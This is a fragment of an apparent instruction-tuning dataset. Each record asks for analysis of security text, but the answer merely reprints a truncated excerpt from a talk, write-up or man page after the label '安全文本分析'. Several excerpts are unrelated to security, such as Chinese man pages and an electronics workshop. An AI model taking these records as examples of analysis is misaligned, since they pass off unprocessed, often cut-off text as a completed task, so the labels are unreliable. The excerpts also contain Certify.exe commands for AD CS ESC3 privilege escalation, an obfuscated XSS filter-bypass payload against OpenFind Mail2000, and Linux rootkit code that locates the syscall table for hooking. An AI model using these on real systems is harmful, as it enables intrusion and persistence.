如果 .I file 可以在特定模式下存取访问,那么成功退出. .I mode 为 .IR rwx 中的一个或多个字符, 这里的 .I r 表示可读, .I w 表示可写,而 .I x 表示可执行. .PP .B access 和 .B test 之间的区别在于 后者查看权限位,而前者使用 .BR access (2) 系统调用进行检查.当文件系统以只读方式被挂载时,两者就有区别了. .\\\"===================================================================== .SH OPTIONS(选项) .B access 接受以下附加的选项: .TP .B --help 打印帮助信息并退出. .TP .B --version 打印版本信息并退出. .\\\"===================================================================== .SH \"SEE ALSO\"(另见) .BR access (2) .SH \"[中文版维护人]\" .B riser <email> .SH \"[中文版最新更新]\" .BR 2003.11.22 .SH \"中国linux论坛man手册页翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" 版权所有 The USENET Community Trust, 1988-1995. .\\\" 中文版版权所有 Liu JingSong, www.linuxforum.net 2000 .\\\" 本文档可在遵照LDP GENERAL PUBLIC LICENSEVersion 1, September 1998 .\\\" 中描述的条件下进行复制,且该文件发布时必须包含该文档 .TH LISTALIAS 1 \"Elm Version 2.5\" \"USENET Community Trust\" .SH NAME listalias \\- 列出用户和系统别名 .SH 总揽 .B listalias [ -s | -u ] [ 正则表达式] .SH 描述 .I Listalias 按用户及系统别名每个输出一行每行具有下列格式 .nf <别名> <地址> (<注解>) .fi 如果采用了正则表达式选项则只有与指定表达式匹配的别名才被列出 如果未采用正则表达式所有别名将被列出 .sp 在两种方式下命令的输出都被排序 .SH 选项 .TP .B \\-s 只输出系统别名 .BR \\ \\-s \\ 和 \\ \\-u 两个选项为互斥关系即两个选项只能选一个 .TP .B \\-u 只输出用户别名 .BR \\ \\-s \\ 和 \\ \\-u 两个选项为互斥关系 .SH 作者 Elm 开发小组 .SH 参见 checkalias(1L), elm(1L), elmalias(1L), newalias(1L) .SH 缺陷 由于该程序通过管道调用了另一个程序egrep, 因此表达式的检查结果由egrep决定而非这个程序自己决定 .SH 程序错误报告至 Bill Pemberton flash@virginia.edu .SH \"[中文版维护人]\" .B Liu JingSong <js-liu@263.net> .SH \"[中文版最新更新]\" .B 2001/05/02 .SH \"[中国 Linux 论坛 man 手册页翻译计划]\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.NET Framework Rootkits  Backdoors Inside Your Framework 1 .NET Framework Rootkits: Backdoors inside your Framework March, 2009 (Revised) Erez Metula ErezMetula@2bsecure.co.il ErezMetula@gmail.com .NET Framework Rootkits  Backdoors Inside Your Framework 2 Table of content TABLE OF CONTENT .........................................................................................................................2 ABSTRACT ............................................................................................................................................3 INTRODUCTION..................................................................................................................................4 HOW CAN THE FRAMEWORK BE CHANGED?..........................................................................................4 MODIFYING THE FRAMEWORK CORE .......................................................................................6 OVERVIEW - STEPS & TOOLS FOR CHANGING THE FRAMEWORK...........................................................6 LOCATE THE DLL IN THE GAC ............................................................................................................6 ANALYZE THE DLL..............................................................................................................................7 DECOMPILE THE DLL USING ILDASM ...................................................................................................9 MODIFYING THE MSIL CODE .............................................................................................................10 RECOMPILE THE DLL USING ILASM....................................................................................................11 BYPASSING THE GAC STRONG NAME MODEL....................................................................................11 REVERTING BACK FROM NGEN NATIVE DLL....................................................................................14 ROOTKIT DEVELO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSmartfuzzing the Web Carpe Vestra Foramina Friday, June 24, 2011 Out of Date  This presentation is out of date.  Grab an updated copy from our Google Code Page  http://code.google.com/p/raft 2 Friday, June 24, 2011 Who are we?  Nathan \"Nate Dawg\" Hamiel  Gregory \"G-Fresh\" Fleischer  Seth \"The Law\" Law  Justin \"J-Roc\" Engler Friday, June 24, 2011 Presentation Overview  Problems with current tools  Current workarounds  Proposed solutions  RAFT Friday, June 24, 2011 Testing Tools Are Lacking  Semi-automated web testing tools can be pretty dumb o Pick your poison, each one falls down at some point o Session data stays stale o State maintenance sucks or non-existent o Can't handle things beyond simple applications o Don't allow the import of externally-collected data  What about modern technologies? o CSRF Tokens o Randomized DOM variables o RIA apps o Web services o JS/AJAX Friday, June 24, 2011 The Problems Continue  Typically no analysis is performed o Testing responses alone may contain a treasure trove of vulnerabilities that are not currently identified o Analysis only runs on current request, what about all the old data? o Just because HTTP is stateless, doesn't mean our analysis has to be. o No vulnerability or sensitive data identification  Testers don't need abstraction o APIs and difficult formats  Missing simple features o Request time Friday, June 24, 2011 And Continue Again  Difficult cases o Risk based logins o Login confirmation on next step o In-session detection Friday, June 24, 2011 And Continue Yet Again  External tools and custom scripts o Can be painful o No analysis o Request/response diffs o Syntax highlighting (duh)? o Full request/response logging  Data in multiple tools o No cross-tool analysis o Archiving problems with collected data o Limited ability to find \"new\" bugs in old data Friday, June 24, 2011 What Do People Do?  Test manually o First of all, Yuck! o Modify other tools for purposes which they weren't intended o Write custom tools and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEmbedded System Design: From Electronics to Microkernel Development Rodrigo Maximiano Antunes de Almeida E-mail: rmaalmeida@gmail.com Twitter: @rmaalmeida Universidade Federal de Itajubá Creative Commons License The work Embedded System Design: From Electronics to Microkernel Development of Rodrigo Maximiano Antunes de Almeida was licensed with Creative Commons 3.0  Attribution  Non Commercial  Share Alike license. Additional permission can be given by the author through direct contact using the e-mail: rmaalmeida@gmail.com Workshop schedule  Electronic building  Board programming  Kernel development Electronic building  Electronics review  Schematics  Protoboard/breadboard  System design  Basic steps  Microcontroller  LCD  Potentiometer Electronics review  http://xkcd.com/730/ Schematics  Way to represent the components and its connections  Each component has its own symbol  Crossing wires only are connected if joined with a dot Protoboard/Breadboard System design  Steps on a generic electronic system design  Define the objective(s)  Choose the main components needed to achieve the objective  Get the use example and recommendations from component datasheet  Build the schematics  Simulation of HW elements  Board layout Datasheets  The main source of information concerning electronics  Presents  Electrical characteristics  Simplified schematics  Use example  Opcodes/API System design  Objective  Build digital voltage reader  Main components  Microcontroller  LCD text display  Potentiometer Microcontroller  System-on-a-chip  Processor  Memory  Input/Output peripherals  Communication  Safety components Microcontroller  Xtal configuration  Reset pin  DC needs  Many peripherals on the same pin LCD Display LCD Display  Data connection  Backlite  Current consumption  Power on time/routine Potentiometer  Linear/Log  Used as voltage divisor  Need an analog input  Filter System design  Cad tool: Fritzing (fritzing.org) 1  Hands On! Board programming  Programmer  IDE  Basic co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 未配置默认根对象的风险简单分析 --- <center><h1>AWS CloudFront 未配置默认根对象的风险简单分析</h1></center> --- ## 0x00 前言 AWS CloudFront 简单理解就是 AWS 的 CDN 服务在 AWS 安全标准和最佳实践中AWS 官方将 CloudFront 未配置默认根对象这个问题定级为严重这里来学习了解一下这个问题 ## 0x01 介绍 我一般在直接看他们官方介绍的时候第一眼往往会让人摸不着头脑再仔细看看才会明白所表达的意思不知道是不是因为翻译的问题这里谈谈我所消化的理解 要明白默认根对象可以先看个例子一般当我们在浏览器里输入访问一个网站时比如 `teamssix.com`实际上浏览器打开的是 `teamssix.com/index.html` 这里的 `index.html` 就是默认根对象 所以默认根对象其实就是指当我们访问一个网站根目录时这个网站所默认跳转指向的对象故而叫默认根对象 在使用 CloudFront 时如果不配置默认根对象就意味着当我们访问 `teamssix.com` 时就真的会访问 `teamssix.com`而不是 `teamssix.com/index.html`这时用户如果想浏览这个网站就需要自己拼接 `/index.html` 路径到 URL 中了 ## 0x02 简单分析 根据官方的描述不配置默认根对象对和 S3 相关的 CloudFront 影响比较多首先这里先创建一个 S3然后再创建一个和 S3 关联的 CloudFront创建完成后CloudFront 会分配给我们一个 URL 地址通过这个地址就可以访问到 S3 服务了 > 实际上这里的描述是不太准确的为了帮助理解我简化了这里的描述 前面说过当没有配置默认根对象的时候我们访问一个网站的根目录真的就是在访问它的根目录那么这时我们访问刚才 CloudFront 分配给我们的地址看看会是什么 </br><img width=\"800\" src=\"/img/1678349592.png\"></br> 可以看到和直接访问 S3 根目录是一样的效果如果此时 S3 存在列举对象的风险的话那么在没有配置默认根对象的时候直接访问 CloudFront 分配地址看到的就是这样的效果 </br><img width=\"700\" src=\"/img/1678349600.png\"></br> > 这个页面中泄漏了 S3 存储桶的名字即这个地址所对应的 S3 真实地址 但如果我们把默认根对象配置成了 index.html再次访问 CloudFront 分配的地址就是这样子这才是预期的展示效果 </br><img width=\"700\" src=\"/img/1678349608.png\"></br> ## 0x03 总结 综上分析配置默认根对象可以在一定程度上避免以下问题 1. 减少 S3 的攻击面 2. 避免真实的 S3 地址泄漏 3. 避免潜在的安全风险和漏洞 4. 避免默认起始页混乱使 CloudFront 能更好的处理客户端请求提升访问者体验 不管是什么问题其影响程度还是需要根据实际情况去具体分析毕竟在某些情况下这个问题有可能会造成很大的影响在某些情况下这个问题可能不会造成啥影响 最后其实还是有一些疑惑在 AWS 安全标准和最佳实践中定级为严重的问题是很少的这个未配置默认根对象的问题我个人觉着定级为高危或者中危应该是比较合理的对于这个问题如果你还知道一些其他的信息欢迎一起沟通 **参考链接** - 什么是 Amazon CloudFront [https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/Introduction.html](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/Introduction.html) - 指定默认根对象 [https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/DefaultRootObject.html](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/DefaultRootObject.html) - CloudFront distributions should have a default root object configured [https://docs.aws.amazon.com/securit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对域证书服务的攻击3- ESC3 0x01 前言 在ESC1的利用的时候好多小伙伴遇到一个错误借用@Rcoil同学的图解决方法也在星球有@Rcoil 同学形成的文档遇到这个错误的同学可以去看下这个错误主要是因为2016以下的系统不支持这个 COM接口因此需要改下代码我开始以为是证书服务器16以下会出这个问题但是我自己搭建12系统 的证书服务器环境发现并没有报错因此我怀疑是域控在16以下这算一个遗留问题具体这个请求是 发送到域控还是证书服务器需要后面分析先mark下 回归正题今天时ESC3的分析ESC3主要滥用的是错误配置了证书申请代理模板Enrollment Agent Templates听名字你也清楚就是一个用户代替另一个用户去申请证书这个一听头脑里的利用 方案就出来了一个普通域用户代替域管理员去申请证书我们具体看下需要怎样的错误配置 模板Enrollment Agent Templates允许一个低权限用户这里我们使用普通域用户去注册一 个代理证书 这个条件和ESC1差不多不需要设置使用者名称为在请求中提供以及在扩展中修改应用程 序策略的EKU为证书申请代理OID1.3.6.1.4.1.311.20.2.1 另外一个模板允许一个低权限用户使用代理证书enrollment agent certificate去代表另外一个 用户请求证书并且这个模板的EKU里配置有允许域认证的EKU 这里有点绕啊不用担心我们老规矩配置环境 0x02 危害环境配置 这里涉及到2个模板我们先配置第一个模板还是在ESC1的基础上配置安全中的配置不变还是配置 了一个domain users组来满足低权限访问这里在实战中要举一反三以我们当前权限为出发点如 果我们当前有一个其他权限而刚好有个一个危害模板在这个权限下能够访问就满足了这个条件而 不是非要domain users的权限使用者名称改回默认的用Active Directory中的信息生成重点修改的 还是扩展中的应用程序策略改为证书申请代理 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-17 No. 1 / 7 - Welcome to www.red-team.cn 第二个模板我们还是在ESC1上设置名称改为ESC3_1在ESC1的基础上安全不用改使用者名称恢复 默认的用Active Directory中的信息生成扩展也不用改保留里面的客户端认证EKU下面的修改是 和以往不同的 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-17 No. 2 / 7 - Welcome to www.red-team.cn 这就是ESC3的2个模板了这需要注意的是你看我一项一项的配置感觉修改的很多大多不是默 认其实不然系统默认模板很多不同配置在不同默认模板中都有默认配置因此我们只需要搞清楚 每个ESC(权限提升)的各个关键配置点理解里面的各个配置的作用在实战中才能灵活运用 0x03 工具利用 Certify.exe find /vulnerable Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-17 No. 3 / 7 - Welcome to www.red-team.cn 这是第一个模板还有第二个模板你会发现这个命令并没有识别出ESC3_1的模板因此使用这个工具 的时候也要注意了不要只用上面的命令查看是否有危害工具不是万能的我们使用 这个命令查看证书服务器上可用的所有模板其中ESC3_1满足我们利用的第二个条件: 首先我们利用ESC3模板获取一个代理证书 Certify.exe find /ca:\"win2019.redteamlab.com\\redteamlab-WIN2019-CA\" Certify.exe request /ca:\"win2019.redteamlab.com\\redteamlab-WIN2019-CA-1\" /template:ESC3 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-17 No. 4 / 7 - Welcome to www.red-team.cn 老规矩pem转pfx这一步我就略去了还不会的同学看前2面文章然后再利用ESC3_1模板去获取 特权证书其中onbehalfof参数一定要使用NETBIOS名xiaoaitiredteamlab\\xiaoaiti redteamlab.com\\xiaoaiti都不行一定要是REDTEAMLAB\\xiaoaiti具体原因可能是工具限制这儿搞", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTell me who you are and I will tell you your lock pattern Marte Løge 23 years, Norway MSc. Computer Science @NUTS Developer @Itera Humans are predictable! How Many Combinations does the Android Lock Pattern Have? 389,112 Length #Combina/ons 4 1624 5 7152 6 26,016 7 72,912 8 140,704 9 140,704 Total 389,112 The Survey Visual Complexity Complexity: [6.3, 46.8] 27.0 46.8 6.34 20.78 All patterns: 13.6 Smartphones: 12.8 Highest score: 44.4 Max score: 46.8 Associations Elements Start node Handedness Right-handed (1) (2) Left-handed (1) (2) 3-gram Sequences Average Pattern Length Women Men ? Questions? Marte Løge @marteloge marte.loge@itera.no", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEasyTousePDDOS :BurnerPhoneDDOS2Dollarsaday:70CallsaMin WestonHeckerSecurityExpert SystemsNetwork Analyst/Penetrations Tester/PresidentOfComputer SecurityAssociationOf NorthDakota A1 Slide 1 A1 Author, 9/16/2013 WhoamIwhatisthistalkabout,  AboutMe:PenetrationTester,ComputerScience/Geophysics,TonsofCerts,Customexploits writtenforPMSHotelSoftware,Twowayreservationfuzzing,madeenclosureforteensy3.0 thatlookslikeiPhoneforPentesting,RFIDScannerthatmountsunderchair.  About9yearsofREALpentesting,DisasterRecovery,SecurityResearch  NERC,FFIEC,ISO,GLBAandFDIC,ComplianceauditsHIPPA,Omnibus,  WrotecustomexploitsandscriptsforobscureInternetserviceprovidergear,  ToolsofthetradeFleetofFakeIphones.  ThecreationofaPhoneCallBomberfromyourGramas prepaidphonetoasolarpowered hackertoolhiddeninlightfixtureatapubliclibrary.  Screenshotdemonstrationof15PhonesTakingdowna200PersonCallcenter.  DistributedDenialofservicePhoneSystemsWhatitishowitsusedHowitEffects Businesses  Alternateusesoncephonehasbeenflashedintoattackplatform. FleetofFakeIphonesWithTeensy3.0 RFIDBadgeReaderScansThroughSeat WhereCustomersWalletWouldBe. DDOSwhatisitTDoS Whatitis? Howdotheydiffer?  (DDoS)attack isanattempttomakeamachineor networkresourceunavailabletoitsintendedusers. Althoughthemeanstocarryout,motivesfor,and targetsofaDoS attackmayvary,itgenerallyconsists ofeffortstotemporarilyorindefinitelyinterruptor suspendservicesofahostconnectedtotheInternet.  TelephonyDenialofServiceorTDoS isafloodof unwanted,maliciousinboundcalls.Thecallsare usuallyintoacontactcenterorotherpartofan enterprise,whichdependsheavilyonvoiceservice. CurrentmethodsofTDOShowithas evolved  (SIPTrunk)SIPtrunking isaVoiceoverInternetProtocol(VoIP) andstreamingmediaservicebasedontheSessionInitiation Protocol(SIP)bywhichInternettelephonyserviceproviders (ITSPs)delivertelephoneservicesandunifiedcommunicationsto customersequippedwithSIPbasedprivatebranchexchange(IP PBX)andUnifiedCommunicationsfacilities.  (PRI)ThePrimaryRateInterface(PRI)isastandardized", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSubmitted in Defcon 18 2010 WPA Too! Md Sohail Ahmad, AirTight Networks md.ahmad@airtightnetworks.com Abstract WPA2 is considered as the most secure configuration for WiFi networks. It is widely used to secure enterprise and private WiFi networks. Interestingly, it is also being used to secure guest, municipal and public WiFi networks. In this paper, we present a vulnerability of WPA2 protocol which can be exploited by a malicious user to attack and compromise legitimate users. We also present a few attack mitigation techniques which can be used to protect genuine WiFi users. I. Introduction The 802.11i [1] specifies security protocols for WiFi networks. RSN is one of the security configurations available in 802.11i and popularly known as WPA2. WPA2 supports two types of authentication- Pres-Shared Key (PSK) and IEEE 802.1x. For data encryption, WPA2 uses AES though it also supports TKIP. TKIP stands for temporal key integrity protocol and used by old devices which are compliant to WEP encryption. AES stands for advanced encryption system. Most of the current generation WiFi devices support AES. A couple of attacks on WPA/WPA2 authentication and encryption that have been published in the past are mentioned below:  PSK vulnerability [2]: PSK is vulnerable to eavesdropping and dictionary attack. To solve PSK vulnerability, it is recommended to use the IEEE 802.1x based authentication.  PEAP vulnerability [3]: A WiFi clients configuration related vulnerability was identified in 2008. It can be avoided by simply following good practices and by not ignoring certificate validation check in client wireless configuration.  TKIP vulnerability [4]: TKIP vulnerability allows attacker to guess IP address of the subnet and then inject few small size frames to cause disruption in the network. Fast re-keying or AES can be used to fix the vulnerability. In the next section, we describe attacks based on a vulnerability of WPA2 protocol and discuss its implications. Finally, we discu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Really Severe Absence Category: Cryptography ## Description > The department of EEvil found out about us discovering the first message and now used the ciphertext and the public key only, what can we do? A text file was attached. ## Solution From the name of the challenge we can guess that it will deal with RSA. Let's check the attached file: ```console root@kali:/media/sf_CTFs/technion/Really_Severe_Absence# cat message.txt n: 848769283437755077035548784522516635384103921776544275081677337510057086183733598581454103934679303651652066293006393981078553762703579330005047284676920312044991975559822684502322187646439014378250877000365350352066611956929398507675377843634401913919699083512768346331297579800305741782747141370577756406261222889559035070084401596892784565363546291321440409291888555160756603708498609280645099312282125403116191445419143250907439089250096209451929942676498686820035639670356097807252447021457782197948212850316994384566168289737766223885929092094227280074131444846016882386341256258759616601854877593006389123279278533231406102413202809835392776910534394656929962036250982103324540327262709391071493052844674492910714795803544306869922574456242836258444460262583842448017089784961970914625668833183356104635443435358686061905071798511457144545270384186829606892597743898280501446872903724882901246587702047743253744306560669096349469988927396072700984382532446439350493549001708621787813626638742542944712309592798723052168372028403008517139980256002503562078028577663027548901622982563986674186689207111720124457037521398517572846793217906717539486954010639528547547078995200443699246353004284196851035519373998374153014345881142142904151602166017632356426097724376244830766907081021642864983103443922278461434860152030210020819976428352729337315856083427783334498442442406721395004409895369982825117770823394167599630360467585393316070436941927472805279098392084414145047162470807750814131565607340919365948229373748838368684855416379713139620249577241593307754", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAshley X Belinda Lets Play Hide and Seek In the Cloud The APT Malwares Favored in Cloud Service HITCON 2015 Lets Play Hide and Seek in the Cloud  Speakers  APT vs Cloud Service  Hide and Seek in SaaS  Redirect  Storage  Control Channel  What APT malware love about cloud service?  What can we do? Outline HITCON 2015 Lets Play Hide and Seek in the Cloud Ashley Belinda Speakers HITCON 2015 Lets Play Hide and Seek in the Cloud Ashley  Ashley Shen  Threat Analyst in Team T5  APT research, Malware analysis  Malicious Document Detection  Member of HITCON GIRLS  ashley@teamt5.org HITCON 2015 Lets Play Hide and Seek in the Cloud Belinda  Belinda Lai  Security Engineer in III  Malware Analysis  Assist organizations handle information security incidents  Member of HITCON GIRLS  belindalai@iii.org.tw APT vs Cloud Service HITCON 2015 Lets Play Hide and Seek in the Cloud Google Trend of Cloud Service HITCON 2015 Lets Play Hide and Seek in the Cloud Software as a Service Platform as a Service Infrastructure as a Service Cloud Service Models HITCON 2015 Lets Play Hide and Seek in the Cloud HITCON 2015 Lets Play Hide and Seek in the Cloud Google Trend of APT Attack Once upon the time Stuxnet Operation Aurora Recently Sony Pictures Garena Hacked HITCON 2015 Lets Play Hide and Seek in the Cloud How do cloud service take part in APT attack? What can malware do with cloud service? HITCON 2015 Lets Play Hide and Seek in the Cloud Web server as C&C server Code VPS as C&C server VM APT Leverage Cloud Service Models Cloud Service as Invisibility cloak IaaS PaaS SaaS HITCON 2015 Lets Play Hide and Seek in the Cloud Cloud Service as Invisibility cloak Data APT Leverage Cloud Service Models VPS as C&C server Web server as C&C server IaaS PaaS SaaS Code VM Hide and Seek in SaaS Redirect Storage Control Channel Redirect Victim Cloud Service Second Stage C&C Encode C&C address String Command 1 2 3 4 Decode String to get IP address The Malwares HITCON 2015 Lets Play Hide and Seek in the Cloud Elir", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTime Line and Nodal Analysis of PLA IW Development Ming Zhou iDefense Security Intelligence Services 19 February , 2009 2 Agenda + What Have Western Seen? + iDefense Research Methodology + PLA IW Timeline + Deduction and Facts + My One Step Leap Time Line 3 What Western Have Seen + Titan Rain + Western governments accusation + Sandia National Laboratories + Congress Offices + DoD Contractors + Pentagon + Navy + NASA + Indian Government 4 By Default + PLA! + PLA? + PLA {x,y,z} + State Sponsor! + State Sponsor? + State Sponsor {a,b,c} + Gaps... 5 Can He Fit the Profile? 6 Questions before starting + Under order? + Just for Fun? + A Soldier with uniform + A Soldier without uniform + Several Soldiers with uniform + Several Soldiers without uniform + PATRIOTISM , PROPAGANDA ACQUIESCENCE 7 Asymmetric war -Card game 8 River Rock to New York City 9 Spot of Cheetah 10 Methodology + Micro to Macro, Macro to Micro, + Methodology {Identify, Verify, Validate, Organize} + Consistency + Continuity + Tangible Entities + Undeniable published news + Cross references +AND 11 Rules + Time + Location + Unit Code + Leaders Name + Order Number + Designated Function + Machine Learning { x, y, z} +OR 12 Hierarchy 13 Sub Sets + CMC  General Staff Department (GSD)  General Political (GPD) Department  General Logistics Department (GLD)  General Armament Department (GAD) + The GSD is responsible for organizing, leading, and commanding military actions. It is made up of departments for war operations, information, communication, military training, army affairs, mobilization, armament, security, mapping and surveying, foreign affairs, as well as the affairs of the various armed services and arms. 14 PLA Force Structure + 7 regions (NE, NW, Beijing, E, Nanjing, SE, SW) + Air force + Navy + 2nd Artillery + Ground Force  Active 500,000  Armed Police Force 1,500,000  Militia 1,000,000 15 Recursively Break down + Chinese Peoples Armed Police Forces (APF) and the Militia.  The Militia is a force engage", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLionBug @ HITCON-CMT About Me  a.k.aLionBug  Co-founder of UCCU  Know a little  Web Security LinkedIn http://thehackernews.com/2016/05/linkedin-account- hack.html LinkedIn 17 wooyun /show.php?id=xxxxx A B C D Admin ASUS Cloud (0day?) /webrelay/directdownload/xxxxxxxx/? dis=xxxx&fi=2040452 ASUS Cloud (0day?) XSS Hacker Friendly EC-Council EC-Council ????????? Google SQL injection drop table    (IP)   (Shellshockstruts2)  APT     HP NAS proxy Tor WIFI WIFI 80 110 143 443 808 8080  phpmyadminfckeditor   SQL injection  Wordpress  CMS SQL injection session VM webshell  phpmyadminfckeditor  ( )  SQL injection ( ...)  () ?????????? au4a83 pass      192.168.0.0 172.168.0.0  db.xx.xx.xx192  MD5 sha256      WAF () 0day WAF Web Hacking Orange http://hitcon.org/2015/CMT/download/day1-c-r0.pdf WAF WAF db OpenFind Mail2000 Cookie Cookie OpenFind Mail2000 Xss (1) IECSSJS 0dayFix OpenFind Mail2000 Xss (2) XSS 0dayFix OpenFind Mail2000 Xss (3)  onclick xonclick  script scrips  html ?? OpenFind Mail2000 <html></html><<html></html>s<html></ html>c<html></html>r<html></html>i<html></ html>p<html></html>t<html></ html>><html></html>a<html></html>l<html></ html>e<html></html>r<html></html>t<html></ html>(<html></html>'<html></html>x<html></ html>s<html></html>s<html></html>'<html></ html>)<html></html>;<html></html><<html></ html>/<html></html>s<html></html>c<html></ html>r<html></html>i<html></html>p<html></ html>t<html></html>> XSS Payload OpenFind Mail2000 XSS 4.56.0 ... 0day ... https://vulreport.net/vulnerability/detail/29 OpenFind Mail2000 Xss (4) script https://zeroday.hitcon.org/vulnerability/ ZD-2016-00062 XSS Xss every where OpenFind Mail2000 modify_id ?? admin https://zeroday.hitcon.org/vulnerability/ ZD-2016-00031 () code review 87     GBK GB2312 GB18030  .php .jsp .asp   webshell Webshell AWS httpsaws 4 5 robots () Watch Dogs .NET   WIFI()  0day  ePage (IonCube v9 )  RulingDigital  ePage http://xxx.xxx.xxx/admin Q & A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH NICE 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 nice \\- 改变执行程序的调度优先级 .SH 概述 \\fBnice\\fP [\\fI\\,选项\\/\\fP] [\\fI\\,命令 \\/\\fP[\\fI\\,参数\\/\\fP]...] .SH 描述 .\\\" Add any additional description here .PP 以调整过的优先级运行命令以影响进程调度如果未给出命令则显示当前的优先级优先级的值的范围从\\fB\\-20\\fP最高级到19最低级 .PP 必选参数对长短选项同时适用 .TP \\fB\\-n\\fP, \\fB\\-\\-adjustment\\fP=\\fI\\,N\\/\\fP 给优先级加上整数N默认为10 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 注意您的 shell 可能内置了自己的 nice 程序版本它会覆盖这里所提及的相应版本请查阅您的 shell 文档获知它所支持的选项 .SH 作者 由 David MacKenzie 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBnice\\fP(2), \\fBrenice\\fP(1) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/nice> .br 或者在本地使用 info \\(aq(coreutils) nice invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n假期看了下linux rootkit的资料想实现个来着整理了些参考资料和代码我的想法是rootkit主要作为 后渗透维权的种式能主要于隐蔽以及能够便触发想实现的功能也很简单就是类似发送个特定 的tcp/udp/icmp包就能触发后反弹个shell或者返回段加密的内容 些历史 1. 先是 LD_PRELOAD 户态使劫持动态链接库的段可以便hook些函数以达到隐藏的的 2. Kernel Module 即编译linux内核修改的代码达到的但编译内核不太现实linux提供了个插 件化的式通过编译个 .ko 件动态加载定义的内核功能在内核态就是操作系统的神什么事 情都会经过你我也主要是学习的这种式 3. 通过操作 /dev/mem 内核内存的式注代码 4. 16年blackhat上的议题通过在系统启动时插个命名空间(类似docker的隔离环境) 1. https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux- Rootkit.pdf Hook rootkit就是对操作系统内核的函数进hook从在些关键函数上执的命令 分为两种hook种是对系统调(syscall)进hook种是对内核的些导出函数进hook 系统调表:https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl 系统调参 考https://syscalls64.paolostivanin.com/ hook内核导出函数实际上就是通过 kallsyms_lookup_name 获取导出函数地址把它换成我们定义的 对系统调syscall的hook实际上就是获取 sys_call_table 的导出函数对这个表的地址hook 在linux内核版本 5.7.0 以上取消了 kallsyms_lookup_name 的导出但还可以使 KPROBE 定位到函数地址 // for linux kernal hook when version >= 5.7.0 #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0) #define KPROBE_LOOKUP 1 #include <linux/kprobes.h> static struct kprobe kp = { .symbol_name = \"kallsyms_lookup_name\" }; #endif unsigned long * get_syscall_table_bf(void) { unsigned long *syscall_table; #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0) #ifdef KPROBE_LOOKUP typedef unsigned long (*kallsyms_lookup_name_t)(const char *name); kallsyms_lookup_name_t kallsyms_lookup_name; register_kprobe(&kp); kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr; 在看canvas的linux rootkit时它是硬件断点在syscall table下断点当执到的时候再修改地址 贴下代码参考 unregister_kprobe(&kp); #endif syscall_table = (unsigned long*)kallsyms_lookup_name(\"sys_call_table\"); return syscall_table; #else unsigned long int i; for (i = (unsigned long int)sys_close; i < ULONG_MAX; i += sizeof(void *)) { syscall_table = (unsigned long *)i; if (syscall_table[__NR_close] == (unsigned long)sys_close) return syscall_table; } return NULL; #endif } /* A simple DR based Linux kernel hooking engine Miami Beach 08/12/2008 */ #include <linux/module.h> #include <linux/kern", "category": "text_analysis", "source": "security_papers"}
